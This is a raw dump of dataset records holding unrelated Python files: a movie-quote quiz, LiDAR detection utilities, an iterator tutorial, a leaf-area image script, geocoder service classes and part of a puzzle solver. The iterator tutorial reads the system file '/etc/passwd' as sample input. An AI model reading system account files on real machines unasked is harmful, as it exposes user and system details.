= {\n \"Houston, we have a problem.\" : \"Apollo 13\",\n \"I'll be back.\" : \"Terminator\",\n \"I'm the king of the world\" : \"Titanic\",\n \"There's no place like home.\" : \"The Wizard of Oz\",\n \"You can't handle the truth!\" : \"A Few Good Men\",\n \"After all, tomorrow is another day!\" : \"Gone With the Wind\",\n \"You're gonna need a bigger boat.\" : \"Jaws\",\n \"I see dead people.\" : \"The Sixth Sense\",\n \"Well, nobody's perfect.\" : \"Some Like It Hot\",\n \"You've got to ask yourself one question: 'Do I feel lucky?' Well, do ya, punk?\" : \"Dirty Harry\"\n }\n\n print(\"Movie Quote Quiz\\n\")\n\n numQuestions = int(input(\"How many questions: \"))\n while numQuestions <0 or numQuestions>10:\n print(\"Error. Invalid input try again.\\n\")\n numQuestions = int(input(\"How many questions: \"))\n\n randomQuestions = random.sample(list(questions), numQuestions)\n qCounter = 1\n correctCounter = 0\n for x in randomQuestions:\n print(\"\\nQuestion: #%s\" %qCounter)\n print(x)\n userAnswer = str(input(\"Whats your answer: \" ))\n if(checkAnswer(userAnswer, questions[x])):\n print(\"\\nGreat you got it right!\")\n correctCounter +=1\n else: \n print(\"\\nIncorrect! The correct answer is: \" , questions[x])\n qCounter +=1\n print(\"\\nYou got %d\" %correctCounter + \" questions correct!\")\n\n \ndef checkAnswer(userAns, movieAns):\n isCorrect = False\n #Convert both to lower case to elimate case sens errors\n convAns = userAns.lower()\n convMovie = movieAns.lower()\n\n #Compare by seeing if answer is in user answer\n if convAns == convMovie:\n isCorrect = True\n else:\n isCorrect = False\n\n return isCorrect\n\nmain()\n","sub_path":"Week4/Assignment4.py","file_name":"Assignment4.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"173588394","text":"\"\"\"\n Util scripts for building features, fetching ground truths, computing IoU, etc. \n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data as data\nimport numpy as np\nimport cv2\nimport math\nimport json\nimport pdb\n\n# Load configs fron json\nwith open('config.json', 'r') as f:\n config = json.load(f)\n\n# Classes of objects and anchors\nclass_list = config[\"class_list\"]\nanchors = config[\"anchors\"]\n\ndef makeBVFeature(PointCloud_, BoundaryCond, Discretization):\n \n # 1024 x 1024 x 3\n Height = 1024 + 1\n Width = 1024 + 1\n\n # Discretize Feature Map\n PointCloud = np.copy(PointCloud_)\n PointCloud[:,0] = np.int_(np.floor(PointCloud[:,0] / Discretization)) # <- X\n PointCloud[:,1] = np.int_(np.floor(PointCloud[:,1] / Discretization) + Width / 2) # <- Y ranges between [-range, range] \n\n # sort 3times with respect to z, y and x respectively\n indices = np.lexsort((-PointCloud[:,2], PointCloud[:,1], PointCloud[:,0]))\n PointCloud = PointCloud[indices]\n\n # Height Map\n heightMap = np.zeros((Height, Width))\n\n # Remove duplicate points\n _, indices, counts = np.unique(PointCloud[:, 0:2], axis = 0, return_index = True, return_counts=True)\n PointCloud_uniq = PointCloud[indices]\n\n # Counts-> Number of duplicate elements for each index in the unique array\n # X in the data is front -> image coordinates y\n # Y in the data is left -> image coordinates x\n heightMap[np.int_(PointCloud_uniq[:, 0]), np.int_(PointCloud_uniq[:, 1])] = PointCloud_uniq[:, 2]\n\n # Intensity Map & DensityMap ##########################\n \n # _, indices, counts = np.unique(PointCloud[:, 0:2], axis = 0, return_index = True, return_counts = True)\n # PointCloud_top = PointCloud[indices]\n # Changed PointCloud_top -> PointCLoud_uniq\n \n # Intensity Map\n intensityMap = np.zeros((Height, Width))\n intensityMap[np.int_(PointCloud_uniq[:, 0]), np.int_(PointCloud_uniq[:, 1])] = PointCloud_uniq[:, 3]\n\n # Density Map\n normalizedCounts = np.minimum(1.0, np.log(counts + 1) / np.log(64))\n densityMap = np.zeros((Height, Width))\n densityMap[np.int_(PointCloud_uniq[:, 0]), np.int_(PointCloud_uniq[:, 1])] = normalizedCounts\n \n\n # RGB channels respectively\n RGB_Map = np.zeros((Height,Width, 3))\n RGB_Map[:,:,0] = densityMap\n RGB_Map[:,:,1] = heightMap\n RGB_Map[:,:,2] = intensityMap\n \n # save = np.zeros((512, 1024, 3))\n save = RGB_Map[0:512, 0:1024, :]\n return save\n\n\ndef get_target(label_file, Tr, boundary, class_list):\n \"\"\" Make target vector (class, x, y, w, l, im, re) \"\"\"\n target = np.zeros([50, 7], dtype = np.float32)\n minX = boundary['minX'] ; maxX = boundary['maxX']\n minY = boundary['minY'] ; maxY = boundary['maxY']\n minZ = boundary['minZ'] ; maxZ = boundary['maxZ']\n \n with open(label_file, 'r') as f:\n lines = f.readlines() \n\n num_obj = len(lines)\n index = 0\n for j in range(num_obj):\n obj = lines[j].strip().split(' ')\n obj_class = obj[0].strip()\n if obj_class in class_list:\n\n # Get target 3D object location x, y\n t_lidar , box3d_corner = box3d_cam_to_velo(obj[8:], Tr)\n location_x = t_lidar[0][0] \n location_y = t_lidar[0][1] \n \n if (location_x > minX) and (location_x < maxX) and (location_y > minY) and (location_y < maxY):\n \n # Make sure target inside the covering area (0,1)\n # x and y interchange?\n target[index][2] = location_x / 40 # X is along height\n \n # Should put this in [0,1] ,so divide max_size 80 m\n target[index][1] = (location_y + 40)/80 # Y is along width\n obj_width = obj[9].strip()\n obj_length = obj[10].strip()\n target[index][3] = float(obj_width) / 80\n target[index][4] = float(obj_length) / 40\n\n # Get target Observation angle of object, ranging [-pi .. pi]\n obj_alpha = obj[3].strip()\n assert target[index][1] <= 1 \n assert target[index][2] <= 1\n # Im axis\n target[index][5] = math.sin(float(obj_alpha))\n\n # Re axis\n target[index][6] = math.cos(float(obj_alpha))\n for i in range(len(class_list)):\n if obj_class == class_list[i]:\n target[index][0] = i\n index = index + 1\n \n return target\n\n\ndef box3d_cam_to_velo(box3d, Tr):\n\n def project_cam2velo(cam, Tr):\n T = np.zeros([4, 4], dtype = np.float32)\n T[:3, :] = Tr\n T[3, 3] = 1\n T_inv = np.linalg.inv(T)\n lidar_loc_ = np.dot(T_inv, cam)\n lidar_loc = lidar_loc_[:3]\n return lidar_loc.reshape(1, 3)\n\n def ry_to_rz(ry):\n angle = -ry - np.pi / 2\n if angle >= np.pi:\n angle -= np.pi\n if angle < -np.pi:\n angle = 2 * np.pi + angle\n return angle\n\n h, w, l, tx, ty, tz, ry = [float(i) for i in box3d]\n cam = np.ones([4, 1])\n cam[0] = tx\n cam[1] = ty\n cam[2] = tz\n t_lidar = project_cam2velo(cam, Tr)\n Box = np.array([[-l / 2, -l / 2, l / 2, l / 2, -l / 2, -l / 2, l / 2, l / 2],\n [w / 2, -w / 2, -w / 2, w / 2, w / 2, -w / 2, -w / 2, w / 2],\n [0, 0, 0, 0, h, h, h, h]])\n rz = ry_to_rz(ry)\n rotMat = np.array([\n [np.cos(rz), -np.sin(rz), 0.0],\n [np.sin(rz), np.cos(rz), 0.0],\n [0.0, 0.0, 1.0]])\n velo_box = np.dot(rotMat, Box)\n cornerPosInVelo = velo_box + np.tile(t_lidar, (8, 1)).T\n box3d_corner = cornerPosInVelo.transpose()\n return t_lidar , box3d_corner.astype(np.float32)\n\n\ndef load_kitti_calib(calib_file):\n \"\"\"\n load projection matrix\n \"\"\"\n with open(calib_file) as fi:\n lines = fi.readlines()\n assert (len(lines) == 8)\n obj = lines[0].strip().split(' ')[1:]\n P0 = np.array(obj, dtype=np.float32)\n obj = lines[1].strip().split(' ')[1:]\n P1 = np.array(obj, dtype=np.float32)\n obj = lines[2].strip().split(' ')[1:]\n P2 = np.array(obj, dtype=np.float32)\n obj = lines[3].strip().split(' ')[1:]\n P3 = np.array(obj, dtype=np.float32)\n obj = lines[4].strip().split(' ')[1:]\n R0 = np.array(obj, dtype=np.float32)\n obj = lines[5].strip().split(' ')[1:]\n Tr_velo_to_cam = np.array(obj, dtype=np.float32)\n obj = lines[6].strip().split(' ')[1:]\n Tr_imu_to_velo = np.array(obj, dtype=np.float32)\n return {'P2': P2.reshape(3, 4),\n 'R0': R0.reshape(3, 3),\n 'Tr_velo2cam': Tr_velo_to_cam.reshape(3, 4)}\n\n\ndef bbox_iou(box1, box2, x1y1x2y2 = True):\n if x1y1x2y2:\n mx = min(box1[0], box2[0])\n Mx = max(box1[2], box2[2])\n my = min(box1[1], box2[1])\n My = max(box1[3], box2[3])\n w1 = box1[2] - box1[0]\n h1 = box1[3] - box1[1]\n w2 = box2[2] - box2[0]\n h2 = box2[3] - box2[1]\n else:\n mx = min(box1[0] - box1[2] / 2.0, box2[0] - box2[2] / 2.0)\n Mx = max(box1[0] + box1[2] / 2.0, box2[0] + box2[2] / 2.0)\n my = min(box1[1] - box1[3] / 2.0, box2[1] - box2[3] / 2.0)\n My = max(box1[1] + box1[3] / 2.0, box2[1] + box2[3] / 2.0)\n w1 = box1[2]\n h1 = box1[3]\n w2 = box2[2]\n h2 = box2[3]\n uw = Mx - mx\n uh = My - my\n cw = w1 + w2 - uw\n ch = h1 + h2 - uh\n carea = 0\n if cw <= 0 or ch <= 0:\n return 0.0\n area1 = w1 * h1\n area2 = w2 * h2\n carea = cw * ch\n uarea = area1 + area2 - carea\n return carea / uarea\n\n\ndef bbox_ious(boxes1, boxes2, x1y1x2y2 = True):\n if x1y1x2y2:\n mx = torch.min(boxes1[0], boxes2[0])\n Mx = torch.max(boxes1[2], boxes2[2])\n my = torch.min(boxes1[1], boxes2[1])\n My = torch.max(boxes1[3], boxes2[3])\n w1 = boxes1[2] - boxes1[0]\n h1 = boxes1[3] - boxes1[1]\n w2 = boxes2[2] - boxes2[0]\n h2 = boxes2[3] - boxes2[1]\n else:\n mx = torch.min(boxes1[0] - boxes1[2] / 2.0, boxes2[0] - boxes2[2] / 2.0)\n Mx = torch.max(boxes1[0] + boxes1[2] / 2.0, boxes2[0] + boxes2[2] / 2.0)\n my = torch.min(boxes1[1] - boxes1[3] / 2.0, boxes2[1] - boxes2[3] / 2.0)\n My = torch.max(boxes1[1] + boxes1[3] / 2.0, boxes2[1] + boxes2[3] / 2.0)\n w1 = boxes1[2]\n h1 = boxes1[3]\n w2 = boxes2[2]\n h2 = boxes2[3]\n \n uw = Mx - mx # Overall width\n uh = My - My # Overall height\n cw = w1 + w2 - uw # Intersection of width\n ch = h1 + h2 - uh # Intersection of height\n mask = ((cw <= 0) + (ch <= 0) > 0)\n area1 = w1 * h1 \n area2 = w2 * h2\n carea = cw * ch # Intersection of area\n carea[mask] = 0 # Area=0 for those batches that are apart -> -ve intersection\n uarea = area1 + area2 - carea # Union of area\n return carea / uarea\n\n\ndef nms(boxes, nms_thresh):\n if len(boxes) == 0:\n return boxes\n det_confs = torch.zeros(len(boxes))\n for i in range(len(boxes)):\n det_confs[i] = 1 - boxes[i][4] \n _, sortIds = torch.sort(det_confs)\n out_boxes = []\n for i in range(len(boxes)):\n box_i = boxes[sortIds[i]]\n if box_i[4] > 0:\n out_boxes.append(box_i)\n for j in range(i+1, len(boxes)):\n box_j = boxes[sortIds[j]]\n if bbox_iou(box_i, box_j, x1y1x2y2 = False) > nms_thresh:\n box_j[4] = 0\n return out_boxes\n\n\ndef convert2cpu(gpu_matrix):\n return torch.FloatTensor(gpu_matrix.size()).copy_(gpu_matrix)\n\n\ndef convert2cpu_long(gpu_matrix):\n return torch.LongTensor(gpu_matrix.size()).copy_(gpu_matrix)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"70736794","text":"def frange(start, stop, increment):\n x = start\n while x < stop:\n a = yield x\n print(a)\n x += increment\n\n\nfor n in frange(0, 5, 1):\n print(n)\n\ng = frange(0, 10, 1)\n\n# 开始传入生成器的值只能是None\ng.send(None)\n\ng.send('this will be printed')\n\n\n# 反向迭代\n\na = [\n 1, 2, 3, 4\n]\n\nfor x in reversed(a):\n print(x)\n\n\n# 反向迭代只有当待处理对象拥有可确定的大小或者实现了 __reversed__() 特殊方法时\n# 才奏效\n\nclass Countdown:\n def __init__(self, start):\n self.start = start\n \n # 正向迭代\n def __iter__(self):\n n = self.start\n while n > 0:\n yield n\n n -= 1\n \n # 反向迭代\n def __reversed__(self):\n n = 1\n while n <= self.start:\n yield n\n n += 1\n\n\n# 带有额外状态的生成器函数\n\nfrom collections import deque\n\nclass linehistorys:\n def __init__(self, lines, histlen=3):\n self.lines = lines\n self.history = deque(maxlen=histlen)\n \n def __iter__(self):\n for lineno, line in enumerate(self.lines, 1):\n self.history.append((lineno, line))\n yield line\n\n def clear(self):\n self.history.clear()\n\n\nwith open('/etc/passwd') as f:\n lines = linehistorys(f)\n for line in lines:\n if 'python' in line:\n for lineno, hline in line.history:\n print('{}:{}'.format(lineno, hline), end='')\n\n\n# 有个细节, 实现了__iter__() 方法的对象,只能叫可迭代对象,但还不是迭代器\n# 在for 循环中,会自动调用iter()来实现,如果单独调用的话,则需要提前使用iter\n\nf = open('/etc/passwd')\nit = iter(f)\nnext(it)\n\n","sub_path":"th_alogri_python/iterator/4-2.py","file_name":"4-2.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"119841146","text":"\"\"\"penfiels_cotyledon_tray_area analysis.\"\"\"\n\nimport os\nimport logging\nimport argparse\n\nimport numpy as np\n\nimport dtool\n\nfrom jicbioimage.core.image import Image\nfrom jicbioimage.core.transform import transformation\nfrom jicbioimage.core.io import AutoName, AutoWrite\n\nfrom jicbioimage.illustrate import AnnotatedImage\n\n__version__ = \"0.1.0\"\n\nAutoName.prefix_format = \"{:03d}_\"\n\n\n@transformation\ndef identity(image):\n \"\"\"Return the image as is.\"\"\"\n return image\n\n\n@transformation\ndef green_minus_red(image):\n im = image[:, :, 1] - image[:, :, 0]\n red_gt_green = image[:, :, 0] > image[:, :, 1]\n im[red_gt_green] = 0\n return im\n\n\n@transformation\ndef abs_threshold(image, cutoff):\n return image > cutoff\n\n\ndef find_leafs(image):\n leafs = green_minus_red(image)\n leafs = abs_threshold(leafs, 40) # 30, 50\n return leafs\n\n\ndef annotate(image, leafs, area, output_path):\n grayscale = np.mean(image, axis=2)\n ann = AnnotatedImage.from_grayscale(grayscale)\n ann[leafs] = image[leafs]\n\n ann.text_at(\n \"Area (pixels): {}\".format(area),\n position=(10, 10),\n color=(255, 0, 255),\n size=132,\n antialias=False,\n center=False)\n\n with open(output_path, \"wb\") as fh:\n fh.write(ann.png())\n\n\ndef analyse_file(fpath, output_dir):\n \"\"\"Analyse a single file.\"\"\"\n logging.info(\"Analysing file: {}\".format(fpath))\n image = Image.from_file(fpath)\n\n image = identity(image)\n leafs = find_leafs(image)\n\n output_fname = os.path.basename(fpath).split(\".\")[0] + \"_annotated.png\"\n output_path = os.path.join(output_dir, output_fname)\n\n area = int(np.sum(leafs))\n annotate(image, leafs, area, output_path)\n return area\n\n\ndef analyse_dataset(dataset_dir, output_dir):\n \"\"\"Analyse all the files in the dataset.\"\"\"\n dataset = dtool.DataSet.from_path(dataset_dir)\n logging.info(\"Analysing files in dataset: {}\".format(dataset.name))\n\n csv_fpath = os.path.join(output_dir, \"summary.csv\")\n with open(csv_fpath, \"w\") as csv_fh:\n\n csv_fh.write(\"identifier,image,tray,area\\n\")\n\n for i in dataset.identifiers:\n\n rel_path = dataset.item_from_hash(i)[\"path\"]\n tray = os.path.dirname(rel_path)\n image_out_dir = os.path.join(output_dir, tray)\n if not os.path.isdir(image_out_dir):\n os.mkdir(image_out_dir)\n\n fpath = dataset.item_path_from_hash(i)\n area = analyse_file(fpath, image_out_dir)\n\n csv_row = [i, rel_path, tray, str(area)]\n csv_line = \",\".join(csv_row)\n csv_fh.write(csv_line + \"\\n\")\n\n\ndef main():\n # Parse the command line arguments.\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"dataset_dir\", help=\"Input dataset directory\")\n parser.add_argument(\"output_dir\", help=\"Output directory\")\n parser.add_argument(\"--debug\", default=False, action=\"store_true\",\n help=\"Write out intermediate images\")\n args = parser.parse_args()\n\n if not os.path.isdir(args.dataset_dir):\n parser.error(\"Not a directory: {}\".format(args.dataset_dir))\n\n # Create the output directory if it does not exist.\n if not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\n AutoName.directory = args.output_dir\n\n # Only write out intermediate images in debug mode.\n if not args.debug:\n AutoWrite.on = False\n\n # Setup a logger for the script.\n log_fname = \"audit.log\"\n log_fpath = os.path.join(args.output_dir, log_fname)\n logging_level = logging.INFO\n if args.debug:\n logging_level = logging.DEBUG\n logging.basicConfig(filename=log_fpath, level=logging_level)\n\n # Log some basic information about the script that is running.\n logging.info(\"Script name: {}\".format(__file__))\n logging.info(\"Script version: {}\".format(__version__))\n\n analyse_dataset(args.dataset_dir, args.output_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583168386","text":"import re\n\nfrom .base import GeocodeService\nimport json\nimport logging\nfrom omgeo.places import Candidate\nfrom omgeo.preprocessors import CancelIfPOBox, CountryPreProcessor, RequireCountry, \\\n ParseSingleLine, ReplaceRangeWithNumber\nfrom omgeo.postprocessors import AttrFilter, AttrExclude, AttrRename, AttrSorter, \\\n AttrMigrator, UseHighScoreIfAtLeast, GroupBy, ScoreSorter\nimport time\ntry:\n from urllib import unquote\nexcept ImportError:\n from urllib.parse import unquote\nlogger = logging.getLogger(__name__)\n\n\nclass Bing(GeocodeService):\n \"\"\"\n Class to geocode using Bing services:\n * `Find a Location by Query `_\n * `Find a Location by Address `_\n\n Settings used by the Bing GeocodeService object may include:\n * api_key -- The API key used to access Bing services.\n\n \"\"\"\n _endpoint = 'http://dev.virtualearth.net/REST/v1/Locations'\n\n DEFAULT_PREPROCESSORS = [\n ReplaceRangeWithNumber()\n ]\n\n DEFAULT_POSTPROCESSORS = [\n AttrMigrator('confidence', 'score',\n {'High':100, 'Medium':85, 'Low':50}),\n UseHighScoreIfAtLeast(100),\n AttrFilter(['Address', 'AdministrativeBuilding',\n 'AgriculturalStructure',\n 'BusinessName', 'BusinessStructure',\n 'BusStation', 'Camp', 'Church', 'CityHall',\n 'CommunityCenter', 'ConventionCenter',\n 'Courthouse', 'Factory', 'FerryTerminal',\n 'FishHatchery', 'Fort', 'Garden', 'Geyser',\n 'Heliport', 'IndustrialStructure',\n 'InformationCenter', 'Junction',\n 'LandmarkBuilding', 'Library', 'Lighthouse',\n 'Marina', 'MedicalStructure', 'MetroStation',\n 'Mine', 'Mission', 'Monument', 'Mosque',\n 'Museum', 'NauticalStructure', 'NavigationalStructure',\n 'OfficeBuilding', 'ParkAndRide', 'PlayingField',\n 'PoliceStation', 'PostOffice', 'PowerStation',\n 'Prison', 'RaceTrack', 'ReligiousStructure',\n 'RestArea', 'Ruin', 'ShoppingCenter', 'Site',\n 'SkiArea', 'Spring', 'Stadium', 'Temple',\n 'TouristStructure'], 'entity'),\n AttrRename('locator', dict(Rooftop='rooftop',\n Parcel='parcel',\n ParcelCentroid='parcel',\n Interpolation='interpolation',\n InterpolationOffset='interpolation_offset')),\n AttrSorter(['rooftop', 'parcel',\n 'interpolation_offset', 'interpolation'],\n 'locator'),\n AttrSorter(['Address'], 'entity'),\n ScoreSorter(),\n GroupBy(('x', 'y')),\n GroupBy('match_addr')]\n DEFAULT_POSTPROCESSORS = []\n\n def __init__(self, preprocessors=None, postprocessors=None, settings=None):\n preprocessors = Bing.DEFAULT_PREPROCESSORS if preprocessors is None else preprocessors\n postprocessors = Bing.DEFAULT_POSTPROCESSORS if postprocessors is None else postprocessors\n GeocodeService.__init__(self, preprocessors, postprocessors, settings)\n\n def _geocode(self, pq):\n if pq.query.strip() == '':\n # No single line query string; use address elements:\n query = {'addressLine': pq.address,\n 'locality': pq.city,\n 'adminDistrict': pq.state,\n 'postalCode': pq.postal,\n 'countryRegion': pq.country}\n else:\n query = {'query': pq.query}\n\n if pq.viewbox is not None:\n query = dict(query, **{'umv':pq.viewbox.to_bing_str()})\n if hasattr(pq, 'culture'):\n query = dict(query, c=pq.culture)\n if hasattr(pq, 'user_ip'):\n query = dict(query, uip=pq.user_ip)\n if hasattr(pq, 'user_lat') and hasattr(pq, 'user_lon'):\n query = dict(query, **{'ul':'%f,%f' % (pq.user_lat, pq.user_lon)})\n\n addl_settings = {'key':self._settings['api_key']}\n query = dict(query, **addl_settings)\n response_obj = self._get_json_obj(self._endpoint, query)\n returned_candidates = [] # this will be the list returned\n for r in response_obj['resourceSets'][0]['resources']:\n c = Candidate()\n c.entity = r['entityType']\n c.locator = r['geocodePoints'][0]['calculationMethod'] # ex. \"Parcel\"\n c.confidence = r['confidence'] # High|Medium|Low\n c.match_addr = r['name'] # ex. \"1 Microsoft Way, Redmond, WA 98052\"\n c.x = r['geocodePoints'][0]['coordinates'][1] # long, ex. -122.13\n c.y = r['geocodePoints'][0]['coordinates'][0] # lat, ex. 47.64\n c.wkid = 4326\n c.address = r['address']\n c.geoservice = self.__class__.__name__\n returned_candidates.append(c)\n return returned_candidates\n\n\nclass USCensus(GeocodeService):\n\n # set endpoint based on whether we geocode by single-line address, or with keyed components\n _endpoint = ''\n _endpoint_base = 'http://geocoding.geo.census.gov/geocoder/locations/'\n\n def _geocode(self, pq):\n query = {\n 'format': 'json',\n 'benchmark': 'Public_AR_Current'\n }\n\n if pq.query:\n _this_endpoint = '%s%s' % (self._endpoint_base, 'onelineaddress')\n query['address'] = pq.query\n else:\n _this_endpoint = '%s%s' % (self._endpoint_base, 'address')\n query['street'] = pq.address\n query['city'] = pq.city\n query['state'] = pq.state\n query['zip'] = pq.postal\n\n logger.debug('CENSUS QUERY: %s', query)\n response_obj = self._get_json_obj(_this_endpoint, query)\n logger.debug('CENSUS RESPONSE: %s', response_obj)\n\n returned_candidates = [] # this will be the list returned\n for r in response_obj['result']['addressMatches']:\n c = Candidate()\n c.match_addr = r['matchedAddress']\n c.x = r['coordinates']['x']\n c.y = r['coordinates']['y']\n c.geoservice = self.__class__.__name__\n # Optional address component fields.\n for in_key, out_key in [('city', 'match_city'), ('state', 'match_region'),\n ('zip', 'match_postal')]:\n setattr(c, out_key, r['addressComponents'].get(in_key, ''))\n setattr(c, 'match_subregion', '') # No county from Census geocoder.\n setattr(c, 'match_country', 'USA') # Only US results from Census geocoder\n setattr(c, 'match_streetaddr', self._street_addr_from_response(r))\n returned_candidates.append(c)\n return returned_candidates\n\n def _street_addr_from_response(self, match):\n \"\"\"Construct a street address (no city, region, etc.) from a geocoder response.\n\n :param match: The match object returned by the geocoder.\n \"\"\"\n # Same caveat as above regarding the ordering of these fields; the\n # documentation is not explicit about the correct ordering for\n # reconstructing a full address, but implies that this is the ordering.\n ordered_fields = ['preQualifier', 'preDirection', 'preType', 'streetName',\n 'suffixType', 'suffixDirection', 'suffixQualifier']\n result = []\n # The address components only contain a from and to address, not the\n # actual number of the address that was matched, so we need to cheat a\n # bit and extract it from the full address string. This is likely to\n # miss some edge cases (hopefully only a few since this is a US-only\n # geocoder).\n addr_num_re = re.match(r'([0-9]+)', match['matchedAddress'])\n if not addr_num_re: # Give up\n return ''\n result.append(addr_num_re.group(0))\n for field in ordered_fields:\n result.append(match['addressComponents'].get(field, ''))\n if any(result):\n return ' '.join([s for s in result if s]) # Filter out empty strings.\n else:\n return ''\n\n\nclass MapQuest(GeocodeService):\n \"\"\"\n Class to geocode using MapQuest licensed services.\n \"\"\"\n _endpoint = 'http://www.mapquestapi.com/geocoding/v1/address'\n\n def _geocode(self, pq):\n def get_appended_location(location, **kwargs):\n \"\"\"Add key/value pair to given dict only if value is not empty string.\"\"\"\n for kw in kwargs:\n if kwargs[kw] != '':\n location = dict(location, **{kw: kwargs[kw]})\n return location\n if pq.address.strip() != '':\n location = {}\n location = get_appended_location(location, street=pq.query)\n if location == {}:\n location = get_appended_location(location, street=pq.address)\n location = get_appended_location(location, city=pq.city, county=pq.subregion, state=pq.state,\n postalCode=pq.postal, country=pq.country)\n json_ = dict(location=location)\n json_ = json.dumps(json_)\n query = dict(key=unquote(self._settings['api_key']),\n json=json_)\n else:\n query = dict(key=unquote(self._settings['api_key']),\n location=pq.query)\n if pq.viewbox is not None:\n query = dict(query, viewbox=pq.viewbox.to_mapquest_str())\n response_obj = self._get_json_obj(self._endpoint, query)\n returned_candidates = [] # this will be the list returned\n for r in response_obj['results'][0]['locations']:\n c = Candidate()\n c.locator=r['geocodeQuality']\n c.confidence=r['geocodeQualityCode'] #http://www.mapquestapi.com/geocoding/geocodequality.html\n match_addr_elements = ['street', 'adminArea5', 'adminArea3',\n 'adminArea2', 'postalCode'] # similar to ESRI\n c.match_addr = ', '.join([r[k] for k in match_addr_elements if k in r])\n c.x = r['latLng']['lng']\n c.y = r['latLng']['lat']\n c.wkid = 4326\n c.geoservice = self.__class__.__name__\n returned_candidates.append(c)\n return returned_candidates\n\n\nclass MapQuestSSL(MapQuest):\n _endpoint = 'https://www.mapquestapi.com/geocoding/v1/address'\n\nclass MapQuestOpen(MapQuest):\n _endpoint = 'http://open.mapquestapi.com/geocoding/v1/address'\n\nclass Nominatim(GeocodeService):\n \"\"\"\n Class to geocode using `Nominatim services hosted\n by MapQuest `_.\n \"\"\"\n _wkid = 4326\n _endpoint = 'http://open.mapquestapi.com/nominatim/v1/search'\n\n DEFAULT_ACCEPTED_ENTITIES = ['building.', 'historic.castle', 'leisure.ice_rink',\n 'leisure.miniature_golf',\n 'leisure.sports_centre', 'lesiure.stadium', 'leisure.track',\n 'lesiure.water_park', 'man_made.lighthouse', 'man_made.works',\n 'military.barracks', 'military.bunker', 'office.', 'place.house',\n 'amenity.', 'power.generator', 'railway.station',\n 'shop.', 'tourism.']\n\n DEFAULT_REJECTED_ENTITIES = ['amenity.drinking_water',\n 'amentity.bicycle_parking', 'amentity.ev_charging',\n 'amentity.grit_bin', 'amentity.atm',\n 'amentity.hunting_stand', 'amentity.post_box']\n\n DEFAULT_PREPROCESSORS = [ReplaceRangeWithNumber()] # 766-68 Any St. -> 766 Any St.\n \"\"\"Preprocessors to use with this geocoder service, in order of desired execution.\"\"\"\n\n DEFAULT_POSTPROCESSORS = [\n AttrFilter(DEFAULT_ACCEPTED_ENTITIES, 'entity', exact_match=False),\n AttrExclude(DEFAULT_REJECTED_ENTITIES, 'entity')\n ]\n \"\"\"Postprocessors to use with this geocoder service, in order of desired execution.\"\"\"\n\n def __init__(self, preprocessors=None, postprocessors=None, settings=None):\n preprocessors = Nominatim.DEFAULT_PREPROCESSORS if preprocessors is None else preprocessors\n postprocessors = Nominatim.DEFAULT_POSTPROCESSORS if postprocessors is None else postprocessors\n GeocodeService.__init__(self, preprocessors, postprocessors, settings)\n\n def _geocode(self, pq):\n query = {'q':pq.query,\n 'countrycodes':pq.country, # only takes ISO-2\n 'format':'json'}\n\n if pq.viewbox is not None:\n query = dict(query, **{'viewbox':pq.viewbox.to_mapquest_str(), 'bounded':pq.bounded})\n\n response_obj = self._get_json_obj(self._endpoint, query)\n\n returned_candidates = [] # this will be the list returned\n for r in response_obj:\n c = Candidate()\n c.locator = 'parcel' # we don't have one but this is the closest match\n c.entity = '%s.%s' % (r['class'], r['type']) # ex.: \"place.house\"\n c.match_addr = r['display_name'] # ex. \"Wolf Building, 340, N 12th St, Philadelphia, Philadelphia County, Pennsylvania, 19107, United States of America\" #TODO: shorten w/ pieces\n c.x = float(r['lon']) # long, ex. -122.13 # cast to float in 1.3.4\n c.y = float(r['lat']) # lat, ex. 47.64 # cast to float in 1.3.4\n c.wkid = self._wkid\n c.geoservice = self.__class__.__name__\n returned_candidates.append(c)\n return returned_candidates\n","sub_path":"omgeo/services/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"328740250","text":"\nimport pyscreenshot # grab()\nimport math # infinity\n\nfrom enums import Color, Direction, MapObject\nfrom mouse import mouseDrag, setMouseCoords\nimport screenshot\n\n# Board width/height in number of blocks\n_BOARD_WIDTH_BLOCK = 6\n_BOARD_HEIGHT_BLOCK = 6\n\n# RGB\n_COLOR_RED = (221, 34, 0)\n_COLOR_GREEN = (34, 204, 0)\n_COLOR_DARKBLUE = (34, 34, 221)\n_COLOR_LIGHTBLUE = (0, 221, 221)\n_COLOR_YELLOW = (238, 238, 0)\n_COLOR_PURPLE = (170, 0, 170)\n\nclass Game():\n\n def __init__(self):\n self.gameboard = []\n self.unconnectedColors = [Color.red, Color.green, Color.darkblue, Color.lightblue, Color.yellow, Color.purple]\n self.xPadding = 0\n self.yPadding = 0\n self.width = 0\n self.height = 0\n self.blocksize = 0\n # self.unconnectedColors = [Color.green]\n\n # Assumes game window is in the foreground\n # A gameboard position consist of a dictionary with information about\n # object on that position such as color, type, parent x and ycoords and distance\n # where the last three are used in findPath (Dijkstras)\n def createGameboard(self):\n\n fullscreenImage=pyscreenshot.grab()\n x1 = screenshot.getLeftside(fullscreenImage)\n y1 = screenshot.getTop(fullscreenImage)\n x2 = screenshot.getRightside(fullscreenImage)\n y2 = screenshot.getBottom(fullscreenImage)\n gameboardImage=pyscreenshot.grab(bbox=(x1,y1,x2,y2))\n self.xPadding = x1\n self.yPadding = y1\n self.width = x2-x1\n self.height = y2-y1\n self.blocksize = self.width/_BOARD_WIDTH_BLOCK\n self.gameboard = [[0 for x in range(_BOARD_WIDTH_BLOCK)] for y in range(_BOARD_HEIGHT_BLOCK)]\n for y in range(_BOARD_HEIGHT_BLOCK):\n for x in range(_BOARD_WIDTH_BLOCK):\n # Magic number five is offset to ensure a 